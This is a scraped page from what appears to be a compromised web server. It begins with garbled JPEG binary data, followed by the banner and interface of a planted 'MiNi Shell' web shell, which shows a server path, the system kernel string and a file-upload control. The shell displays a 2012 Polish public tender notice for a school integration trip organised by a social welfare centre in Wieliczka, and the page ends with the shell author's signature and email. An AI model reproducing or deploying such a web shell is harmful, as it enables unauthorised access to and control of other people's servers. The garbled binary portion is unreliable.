JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120614/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120614/202944-N-2012.html

<p class="kh_header"><b>Wieliczka: Świadczenie usług z zakresu aktywizacji społeczno-zawodowej - realizacji Projektu Systemowego Czas na Aktywność. Aktywność  społeczna i zawodowa klientów Ośrodka Pomocy Społecznej w formie zakupu usługi turystycznej polegającej na zorganizowaniu wyjazdu integracyjnego wraz ze wsparciem psychologicznym i doradztwem zawodowym dla gimnazjalistów</b><br>
<b>Numer ogłoszenia: 202944 - 2012; data zamieszczenia: 14.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejsko-Gminny Ośrodek Pomocy Społecznej , ul. Sienkiewicza 26, 32-020 Wieliczka, woj. małopolskie, tel. 12 278 19 55, faks 12 278 19 55.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług z zakresu aktywizacji społeczno-zawodowej - realizacji Projektu Systemowego Czas na Aktywność. Aktywność  społeczna i zawodowa klientów Ośrodka Pomocy Społecznej w formie zakupu usługi turystycznej polegającej na zorganizowaniu wyjazdu integracyjnego wraz ze wsparciem psychologicznym i doradztwem zawodowym dla gimnazjalistów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: Świadczenie usług z zakresu aktywizacji społeczno-zawodowej - realizacji Projektu Systemowego Czas na Aktywność. Aktywność  społeczna i zawodowa klientów Ośrodka Pomocy Społecznej w formie zakupu usługi turystycznej polegającej na zorganizowaniu wyjazdu integracyjnego wraz ze wsparciem psychologicznym i doradztwem zawodowym dla gimnazjalistów, zgodnie z poniższymi wytycznymi:
1.	Wycieczka do Muszyny
1)	Termin wycieczki: od dnia podpisania umowy do 30.06.2012 r.
2)	Ilość uczestników: 26 gimnazjalistów , 34 osoby otoczenia , 4 opiekunów ze strony Zamawiającego
3)	Program wycieczki do Muszyny:

Dzień 1 
a)	godz. 6:45 zbiórka uczestników pod budynkiem Gimnazjum w Golkowicach,
b)	godz. 7:00 wyjazd,
c)	przejazd autokarem przez Stary Sącz - zwiedzanie Klasztoru ss. Klarysek,
d)	przejazd Doliną Popradu przez Rytro, Piwniczną Żegiestów do Muszyny,
e)	obiad, zgodnie z menu na osobę;
	zupa pomidorowa 250 ml
	kotlet de volaille 180 g, 
	frytki 150 g, 
	surówka z kapusty pekińskiej 150g, 
	kompot z jabłek 250 ml.
f)	w Muszynie zwiedzanie ruin XIV wiecznego zamku, 
g)	zakwaterowanie,
h)	organizacja zajęć z psychologiem i doradcą zawodowym dla 26 gimnazjalistów - 4 godz. dydaktyczne, dla pozostałych uczestników organizacja zajęć rekreacyjno - sportowych,
i)	19.00 - 19. 45 - kolacja w miejscu zakwaterowania lub w miejscu odległym do 200 m od miejsca zakwaterowania, zgodnie z menu na osobę:
	pasztet pieczony - 60 g., 	wędlina drobiowa - 80 g. 
	chleb wiejski 120g, 
	ogórek/pomidor 100g., 
	herbata 250 ml, 
	cukier 10g., 
	masło 15 g., 
	dżem/powidło 50 g.
j)	nocleg


Dzień 2 
a)	godz. 8:00 - 9:00 śniadanie w miejscu zakwaterowania lub w miejscu odległym do 200 m od miejsca zakwaterowania, zgodnie z menu na osobę:  
	ser twarogowy ziarnisty 150 g ,
	polędwica luksusowa 60 g., 
	pasztet pieczony - 60 g, 	ogórek/pomidor 100g
	ciasto drożdżowe 50 g, 
	chleb wiejski 120 g, 
	dżem z czarnych porzeczek niskosłodzony/miód 50 g, 
	herbata 250 ml, 
	cukier 10 g , 
	masło 15g
b)	godz. 9:30 -13:00 - organizacja zajęć z psychologiem i doradcą zawodowym dla 26 gimnazjalistów - 5 godz. dydaktycznych, dla pozostałych uczestników organizacja zajęć rekreacyjno - sportowych,
c)	godz. 13:00 - 13:45 obiad w miejscu zakwaterowania lub w miejscu odległym do 200 m od miejsca zakwaterowania, zgodnie z menu na osobę:
		rosół z makaronem 250 ml, 
	kotlet schabowy panierowany 180 g, 
	ziemniaki puree 150 g, 
	marchewka zasmażana 150 g., 
	kompot wieloowocowy 250 ml
d)	godz. 14:00 - 18:00 organizacja zajęć z psychologiem i doradcą zawodowym dla 26 gimnazjalistów - 5 godz. dydaktycznych, dla pozostałych uczestników organizacja zajęć rekreacyjno - sportowych,
e)	godz. 19:00 - 19:30 ognisko lub w przypadku opadów deszczu - grill, zgodnie z menu na osobę:
	dwie porcje kiełbasy - 120 g każda, 
	chleb 200 g. 
	ketchup, musztarda, 
	herbata 500 ml, 
	cukier 
Wykonawca zapewni jednorazowe tacki, sztućce oraz serwetki.
f)	nocleg.
Dzień 3 
a)	godz. 8:00 - 9:00 pakowanie i wymeldowanie z miejsca zakwaterowania
b)	godz. 9:00 - 9:45 śniadanie w miejscu zakwaterowania lub w miejscu odległym do 
200 m od miejsca zakwaterowania, zgodnie z menu na osobę
	ser Tylżycki pełnotłusty 80 g, 
	jajecznica 150 g, 
	szynka wołowa gotowana 80g, 
	rogal francuski/jagodzianka 80 g, 
	ogórek/pomidor 100g, 
	chleb wiejski 120 g
	dżem truskawkowy niskosłodzony/miód 50 g, 
	herbata 250 ml, 
	cukier 10 g, 
	masło 15g.
c)	godz. 10.00 wyjazd do Krynicy - Zdrój, na miejscu -  spacer deptakiem, wyjazd kolejką na Górę Parkową, zejście ścieżką zdrowia przez lasek do Pijalni Wód Mineralnych gdzie chętni będą mogą spróbować krynickich wód,
d)	godz. 13:45 -14.30 obiad, zgodnie z menu na osobę;
	zupa koperkowa 250 ml.
	karkówka z grilla 200g, 
	frytki 200 g, 
	zestaw surówek 4 rodzaje 150 g, 
	kompot 250 ml, 
e)	godz. 15.00 wyjazd z Krynicy - Zdroju 
f)	godz. 18.00 przyjazd do Golkowic.

2.	Warunki dodatkowe:
a)	 Zamawiający zastrzega sobie prawo do zmiany liczby uczestników (odbiorców usług) w sytuacjach niezależnych od zamawiającego, których nie mógł przewidzieć w chwili zawarcia umowy np. choroba uczestnika itp. O zaistniałej sytuacji Zamawiający pisemnie zawiadomi niezwłocznie Wykonawcę.
b)	dokumentacja realizowanych działań odbywać się musi między innymi za pomocą dzienników prowadzonych zajęć, imiennych list obecności.
3.	Wykonawca zapewni:
1)	bilety wstępu do zwiedzanych obiektów, 
2)	pokrycie opłat parkingowych, 
3)	opiekę przewodnika podczas zwiedzania obiektów, 
4)	transport autokarowy 
Autokar ma być dostępny przez cały czas trwania wycieczki. Wykonawca zapewni sprawdzenie stanu technicznego autokaru przez Policję w dniu wyjazdu. Kierowca musi uzyskać protokół dopuszczenia pojazdu i kierowcy do przewozu osób. Kierowca musi posiadać wymagane przepisami dokumenty m.in. licencję przewoźnika. Wykonawca zapewni autokar sprawny technicznie. Przewoźnik musi posiadać wymagane prawem ubezpieczenia. Kierowca jest zobowiązany do dbania o czystość autokaru podczas podróży (zewnątrz jak i wewnątrz).
5)	ubezpieczenie wszystkich uczestników od następstw nieszczęśliwych wypadków (NNW) na kwotę co najmniej 10 000 zł. na każdego uczestnika. Uczestnicy wyjazdu muszą zostać ubezpieczeni od następstw nieszczęśliwych wypadków  
 w  trakcie przejazdów oraz w trakcie trwania wyjazdu oraz kosztów leczenia Wykonawca przedłoży Zamawiającemu polisę -   umowę ubezpieczenia uczestników wyjazdu nie później niż 48 godzin przed terminem wyjazdu,
6)	bilety komunikacji zbiorowej w przypadku konieczności poruszania się takimi środkami transportu,
7)	materiały piśmiennicze dla gimnazjalistów: blok rysunkowy A4 - 1 szt., długopis typu Zenith - 1 szt., zestaw 2 szt. pisaków: czerwony i czarny,
8)	świadczenia dla opiekunów ze strony Zamawiającego takie same jak dla uczestników wycieczek,
9)	2 noclegi w Muszynie lub ośrodku położonym nie dalej niż 15 km od Muszyny adres: o następującym standardzie:
a)	sale do prowadzenia zajęć grupowych,
b)	dostęp do Internetu,
c)	dostęp do TV,
d)	miejsca na ognisko, grill,
e)	dostęp do aneksu kuchennego,
f)	parking,
g)	pokoje z łazienkami 2 lub 3 lub 4 - osobowe
h)	wyposażenie łazienek w ręczniki oraz mydło,
i)	łóżka jednoosobowe (Zamawiający nie dopuszcza łóżek piętrowych) 

Zamawiający dopuszcza możliwość zmiany kolejności zwiedzania i harmonogramu wycieczki oraz dopuszcza możliwość zmiany terminu jeżeli warunki atmosferyczne lub inne czynniki niezależne od Zamawiającego będą uzasadniały przesunięcie terminu..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający może udzielić Wykonawcy zamówień uzupełniających w trybie zamówienia z wolnej ręki w okresie 3 lat od udzielenia zamówienia podstawowego, stanowiących nie więcej niż 50 % wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówienia .</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8, 85.12.12.70-6, 85.31.23.20-8, 55.12.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>osoby realizujące przedmiot zamówienia powinny spełniać łącznie poniższe warunki, tj.:
a)	posiadać wykształcenie: wyższe na kierunku psychologia lub pedagogika i  doradztwo zawodowe lub ukończone studia podyplomowe w zakresie organizacji i doradztwa zawodowego,
i
b)	posiadać doświadczenie zawodowe w okresie ostatnich trzech lat przed terminem składania ofert w wymiarze minimum 10 godzin w zakresie odpowiadającym przedmiotowi zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>wpis do Rejestru Organizatorów Turystyki i Pośredników  Turystycznych.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiany mogą dotyczyć takich kwestii jak: termin realizacji zamówienia oraz warunki płatności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mgopswieliczka.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejsko-Gminny Ośrodek Pomocy Społecznej w Wieliczce, 32-020 Wieliczka, 
ul. Sienkiewicza 26.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.06.2012 godzina 09:00, miejsce: Miejsko-Gminny Ośrodek Pomocy Społecznej w Wieliczce, 32-020 Wieliczka, 
ul. Sienkiewicza 26, dziennik podawczy.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt realizowany w ramach Działania 7.1 Programu Operacyjnego Kapitał Ludzki, Poddziałanie 7.1.1 Rozwój i upowszechnienie aktywnej integracji przez ośrodki pomocy społecznej współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com